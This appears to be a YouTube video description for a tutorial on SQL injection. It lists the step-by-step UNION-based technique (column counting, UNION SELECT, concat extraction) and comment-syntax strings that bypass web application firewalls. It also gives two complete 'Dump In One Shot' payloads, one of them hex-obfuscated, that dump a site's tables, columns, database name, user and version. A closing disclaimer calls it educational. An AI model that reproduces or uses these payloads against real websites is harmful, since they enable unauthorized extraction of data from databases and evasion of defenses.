What is SQL injection attack and how can do it? SQL ইনজেকশন আক্রমণ কি ও কিভাবে আপনি এটা করবেন?

I have tried to describe what is SQL Injection attack and how the SQLI attack work. The first session is descriptive and the last session is practical. If you have look whole video you can understand all about SQL injection and can do SQL injection test to your own site.

👉 Some command are used here:
1. Order By [column number]
2. Union Select [ column range]
3. version()
4. concat(tbl_filed,0x3d3d,tbl_field, ...)
5. Union Select WAF bypass string conversion /*!50000Union*/ /*!50000Select+*/ and /*!50000concat*/(tbl_filed,0x3d3d,tbl_field, ...)
6. Text to URL converter https://onlinetexttools.com/url-encod...
7. DIOS (Dump In One Shot) you can find it at github. please google for more. Here I have used this two DIOS, first one for normal sites and second one for WAF (Web Application Firewall) enable sites

👉 DIOS1: (select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=concat(@a,table_name,0x203a3a20,column_name,0x3c62723e))))a)

👉 DIOS2: concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a20416c69204b68616e2028416b446b292044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0) from(information_schema./**/columns)where(table_schema=database()) and(0x00)in(@x:=Concat/*!(@x, 0x3c62723e, if( (@tbl!=table_name), Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1, 2, 0x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e), 0x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/
-End-
If you face any difficulties please leave a comments here. I will try to solve it inshallah. You are also welcome to request me for making cyber security related any video. You may give likes or share this video if you think it will be help to others.

👉 Social networks:
1. Facebook:   / cyber-security-109995281357584  
2. Instagram:   / omizan  
3. Tweeter:   / o_mizan  

Thank you for watching.
Mizan

⚠️ Disclaimer: Hacking without permission is illegal. This channel is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing so that we can protect ourselves against the real hackers.

#sqlinjection